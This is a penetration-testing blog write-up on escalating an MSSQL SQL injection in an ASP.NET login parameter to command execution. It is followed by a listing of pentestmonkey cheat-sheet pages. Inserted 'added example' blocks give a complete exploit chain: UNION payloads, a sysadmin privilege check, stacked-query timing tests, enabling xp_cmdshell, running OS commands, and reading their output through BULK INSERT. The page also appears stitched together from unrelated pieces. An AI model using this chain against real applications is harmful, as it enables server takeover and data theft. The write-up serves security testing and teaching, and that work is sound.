Pentestmonkey Sql Injection Cheat Sheet



Once again, I'm back with another story of an interesting finding. This time I'll be explaining an SQL injection instance, but this one was a bit different. The application is built on ASP.NET, uses MSSQL, supports stacked queries, and the DB user is a sysadmin. Everything looks perfect for executing xp_cmdshell. The only problem I faced is that I cannot get the output of any query stacked after the first one. On top of that, the application sits behind a firewall that allows no access to the outside world. So I can execute OS commands, yes, but cannot see their output. That makes it a kind of blind RCE. But, as the title says, this is a not-so-blind RCE.


I have set up an identical test environment to demonstrate the exact problem at hand. Let's see how we can extract the output of xp_cmdshell here.

Performing the UNION based SQL Injection

First, let’s analyse the vulnerable request and try to perform a UNION based SQL Injection. Looking at the screenshot below, the txtUserName parameter is vulnerable to SQL Injection.

Naturally, we'll try to close the string literal and comment out the rest of the query. But we get a different error when we do so:

The error says basicsalary is an invalid column name. Looking closely at the fragment of the query disclosed in the error message when the payload is just a single quote, we can see that the query joins a Payslips table, and basicsalary is presumably a column of that table. Our comment is removing that join, so the select list can no longer resolve the column. That means our payload must re-supply the join to Payslips before it comments the rest of the query out. Let's try that:

The query executes and we get data back! From here we proceed with the usual ORDER BY step to find the column count, and then a UNION statement, to obtain a working UNION-based SQL injection:


Checking the privileges of DB user

The next step is to check whether the DB user is a sysadmin, because enabling xp_cmdshell via sp_configure requires the ALTER SETTINGS server permission, which members of the sysadmin role have. Executing OS-level commands is our ultimate goal here.

Here I would like to introduce an awesome SQL Injection Cheat Sheet that I use. It is from pentestmonkey. Looking at this cheat sheet, we find that the query SELECT is_srvrolemember('sysadmin') tells us whether the current DB login is a member of the sysadmin role. Let's try that:

Since we get a 1 in the response, we can confirm that the current DB user is indeed a sysadmin (a 0 would mean it is not a member, and a NULL would mean the role name or login was not recognised).
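The payload progression for the UNION step and the privilege check, as an added example that is not part of the original post. The only details taken from the post are the txtUserName parameter, the Payslips table, the basicsalary column and the four-column UNION; the rest of the back-end query (an Employees table, a Departments join, the aliases and the p.empid = e.id join condition) is a hypothetical shape chosen so that a `--` in the parameter also swallows the Payslips join, which is what the error message in the post implies.

```sql
-- Added example, not from the original post. Assumed back-end query (the
-- names other than Payslips and basicsalary are hypothetical), built by the
-- application on a single line, so a "--" comments out everything after it:
--
--   SELECT name, deptname, basicsalary, hra
--   FROM Employees e
--   JOIN Departments d ON d.id = e.deptid AND e.username = '<txtUserName>'
--   JOIN Payslips p ON p.empid = e.id

-- Step 1: a lone quote breaks the literal; the error discloses a query fragment.
--   txtUserName = '

-- Step 2: close the literal and comment out the remainder. The Payslips join is
-- commented away too, so the select list no longer resolves:
--   txtUserName = ' --
--   -> Invalid column name 'basicsalary'

-- Step 3: re-supply the join before the comment; the query now runs and returns
-- the rows for an empty username (none, which is fine for UNION):
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id --

-- Step 4: find the column count. ORDER BY 4 succeeds, ORDER BY 5 errors:
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id ORDER BY 4 --

-- Step 5: a working UNION with placeholder values; whichever placeholders are
-- echoed back tell us which columns reach the page:
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id UNION SELECT 1,2,3,4 --

-- Step 6: put the privilege check into an echoed column. IS_SRVROLEMEMBER
-- returns 1 (member), 0 (not a member) or NULL (unknown role or login).
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id UNION SELECT 1,IS_SRVROLEMEMBER('sysadmin'),3,4 --

-- What the server actually executes for step 6. The original literal is closed
-- by the first quote of the payload; the application's own trailing join ends
-- up behind the comment marker and is ignored.
SELECT name, deptname, basicsalary, hra
FROM Employees e
JOIN Departments d ON d.id = e.deptid AND e.username = ''
JOIN Payslips p ON p.empid = e.id
UNION SELECT 1, IS_SRVROLEMEMBER('sysadmin'), 3, 4 --' JOIN Payslips p ON p.empid = e.id
```

The first branch of the UNION returns no rows because the username is now the empty string, so the page renders only the injected row. Any column that is echoed back works for the check; the second column is used here only because it is assumed to be displayed.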

Checking the support for stacked queries

Stacked queries mean that we can run multiple statements in a single batch by separating them with a semicolon, just as we can on the command line. So if we have a query like this:

With stacked queries supported, we can run queries like this:

Without stacked queries, we are limited to what fits inside the original SELECT and cannot run INSERT, UPDATE, DELETE or EXEC statements of our own. With stacked queries, we can execute any kind of statement we want. That's why, peeps, when stacked queries are not available (and the injection point is not already inside a data-modifying statement), a read-only SELECT injection does not justify an Integrity impact in the CVSS vector.

Anyway, moving ahead, let's check whether stacked queries are supported. We will stack a WAITFOR DELAY statement after our query and see if it executes:

A delay of 5 seconds here confirms that stacked queries are supported. Now let's see whether we can get the output of a stacked query too. To do so, we'll stack our SELECT 1,2,3,4 after the original query instead of UNIONing it:

Notice that we get no output for our SELECT 1,2,3,4. The application only consumes the first result set of the batch, so we will not see the output of anything we stack after the initial query.
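The two stacked-query checks described above, as an added example that is not part of the original post. The join condition `p.empid = e.id` and the surrounding Employees/Departments query are assumptions made so the payloads are syntactically complete; only txtUserName, Payslips and the four-column SELECT come from the post.

```sql
-- Added example, not from the original post. Assumed single-line back-end
-- query (hypothetical names except Payslips):
--   SELECT name, deptname, basicsalary, hra FROM Employees e
--   JOIN Departments d ON d.id = e.deptid AND e.username = '<txtUserName>'
--   JOIN Payslips p ON p.empid = e.id

-- Check 1: timing. A statement after ';' runs even though the page never shows
-- its result. Send the same payload with 0 and with 5 seconds and compare the
-- response times against a few baseline requests, so a slow server is not
-- mistaken for a positive.
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id; WAITFOR DELAY '0:0:0' --
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id; WAITFOR DELAY '0:0:5' --
-- Server executes (second variant):
SELECT name, deptname, basicsalary, hra FROM Employees e
JOIN Departments d ON d.id = e.deptid AND e.username = ''
JOIN Payslips p ON p.empid = e.id; WAITFOR DELAY '0:0:5' --' JOIN Payslips p ON p.empid = e.id
-- -> response delayed by roughly 5 s: stacked statements execute.

-- Check 2: output. Stack the SELECT instead of UNIONing it.
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id; SELECT 1,2,3,4 --
-- Server executes:
SELECT name, deptname, basicsalary, hra FROM Employees e
JOIN Departments d ON d.id = e.deptid AND e.username = ''
JOIN Payslips p ON p.empid = e.id; SELECT 1,2,3,4 --' JOIN Payslips p ON p.empid = e.id
-- The batch produces two result sets. An ADO.NET SqlDataReader only exposes the
-- first one unless the code calls NextResult(), so 1,2,3,4 never reaches the page.
-- Compare with the UNION form, which folds the injected row into the first
-- (and only) result set and therefore is displayed:
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id UNION SELECT 1,2,3,4 --
```

The practical consequence is that the stacked channel is write-only from the attacker's point of view: it can change state and it can cause delays, but anything we want to read has to be routed back through the first result set, which is what the UNION gives us.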

Executing xp_cmdshell

Now let's enable xp_cmdshell and confirm that we are at least able to execute an OS command. To do that, refer back to the cheat sheet. The following SQL statements need to be executed:

Let’s do that:

Awesome! We have enabled xp_cmdshell. Now let's test it:

A delay of about 3 seconds (ping sends 4 echo requests by default on Windows, one second apart) shows that we indeed have command execution! At this point, the usual move is to connect back to our VPS and obtain a working shell. If the application is behind a firewall that blocks outgoing connections but still allows DNS resolution, you can use the DNS exfiltration method described here. But the firewall in our case does not allow any outside interaction at all. So far, we are stuck with a blind RCE.

Escalating blind RCE to not-so-blind RCE

What we can do is run a command and redirect its output to a file inside the webroot, then fetch that file from the website itself. For instance, if the site is hosted in C:\inetpub\wwwroot, we would use xp_cmdshell to execute a command like whoami > C:\inetpub\wwwroot\opt.txt and then browse to http://site.com/opt.txt to get the output of the whoami command.

Well…

We do not know the physical path of the website in this scenario, so we have to read the file some other way. Looking back at our good old cheat sheet, we do find one: the file can be loaded into a table with BULK INSERT and then read through our UNION channel. We can execute the following queries to read a file:

Let's use this method. First, let's execute our command and store its output in a temporary file:

Now, we’ll create a table and store the contents of our temporary file in that table:

Once we have the contents in our table, let’s read it using the UNION query we have:

And boom! We can now read the output of the commands we execute!
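The whole chain from enabling xp_cmdshell through to reading the command output, covering both the "Executing xp_cmdshell" section and the file-redirect/BULK INSERT method above, as an added example that is not part of the original post. The sp_configure, xp_cmdshell and BULK INSERT statements are standard MSSQL (they are the ones the pentestmonkey sheet lists); the temporary file path C:\Windows\Temp\out.txt, the table name dbo.cmdout and the Payslips join condition are assumptions. Each statement is sent stacked after the application's own query, exactly as the WAITFOR DELAY test was, so the leading `' JOIN Payslips p ON p.empid = e.id;` prefix and the trailing `--` of the payload are omitted from the statements below.

```sql
-- Added example, not from the original post. Statements are shown as the
-- server executes them; in the request each one is stacked after the app's
-- query (prefix: ' JOIN Payslips p ON p.empid = e.id;   suffix: --).
-- Assumed: temp path C:\Windows\Temp\out.txt and table dbo.cmdout.

-- 1. Enable xp_cmdshell. sp_configure needs ALTER SETTINGS, which the sysadmin
--    role confirmed earlier holds. RECONFIGURE applies the change.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- 2. Blind execution check: 4 echo requests one second apart gives a ~3 s delay.
EXEC xp_cmdshell 'ping -n 4 127.0.0.1';

-- 3. Run the real command. xp_cmdshell goes through cmd.exe, so redirection
--    works; 2>&1 captures errors as well. The path must be writable by the
--    SQL Server service account, not the web server's.
EXEC xp_cmdshell 'whoami /all > C:\Windows\Temp\out.txt 2>&1';

-- 4. Load the file into a one-column table, one row per line. The default
--    field terminator is a tab, so a command whose output contains tabs
--    would need a FIELDTERMINATOR that cannot occur in the data.
IF OBJECT_ID('dbo.cmdout') IS NOT NULL DROP TABLE dbo.cmdout;
CREATE TABLE dbo.cmdout (line VARCHAR(8000));
BULK INSERT dbo.cmdout FROM 'C:\Windows\Temp\out.txt' WITH (ROWTERMINATOR = '\n');

-- 5. Read it back through the UNION channel (this one is a UNION payload, not
--    a stacked one), one page row per output line:
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id UNION SELECT 1, line, 3, 4 FROM dbo.cmdout --
-- If the page only renders a single row, collapse all lines into one value
-- first and inject that instead:
--   txtUserName = ' JOIN Payslips p ON p.empid = e.id UNION SELECT 1, STUFF((SELECT '|' + line FROM dbo.cmdout FOR XML PATH('')), 1, 1, ''), 3, 4 --

-- 6. Clean up after the test: drop the table, delete the file and put
--    xp_cmdshell back the way it was found.
DROP TABLE dbo.cmdout;
EXEC xp_cmdshell 'del C:\Windows\Temp\out.txt';
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```

Because the file is read by the database engine rather than the web server, the webroot path is irrelevant: the only requirements are that the SQL Server service account can write the temp file in step 3 and read it in step 4, which is why a system temp directory is a safer guess than anything under IIS.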

Cheat Sheets


Reverse Shell Cheat Sheet

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you'll probably want an interactive shell. If it's not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding [..]

Tags: bash, cheatsheet, netcat, pentest, perl, php, python, reverseshell, ruby, xterm

Posted in: Shells

SSH Cheat Sheet

SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features. NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples. SOCKS Proxy Set up a SOCKS proxy on 127.0.0.1:1080 that lets [..]

Tags: pentest, ssh

Posted in: Cheat Sheets

John The Ripper Hash Formats

John the Ripper is a favourite password cracking tool of many pentesters. There is plenty of documentation about its command line options. I've encountered the following problems using John the Ripper. These are not problems with the tool itself, but inherent problems with pentesting and password cracking in general. Sometimes I stumble across hashes on a [..]

Tags: johntheripper, pentest

Posted in: Cheat Sheets

Informix SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into Informix databases…

Tags: cheatsheet, database, informix

Posted in: SQL Injection

MSSQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into MSSQL databases…

Tags: cheatsheet, mssql, sqlinjection

Posted in: SQL Injection

Oracle SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into Oracle databases…

Tags: cheatsheet, database, oracle, pentest, sqlinjection

Posted in: SQL Injection

MySQL SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into MySQL databases…

Tags: cheatsheet, database, mysql, pentest, sqlinjection

Posted in: SQL Injection

Postgres SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into PostgreSQL databases…


Tags: cheatsheet, database, pentest, postgresql, sqlinjection

Posted in: SQL Injection

DB2 SQL Injection Cheat Sheet

Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you do find one, though it pays to be prepared…

Tags: cheatsheet, database, db2, pentest, sqlinjection

Posted in: SQL Injection

Ingres SQL Injection Cheat Sheet

Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier.

Tags: cheatsheet, database, ingres, pentest, sqlinjection

Posted in: SQL Injection




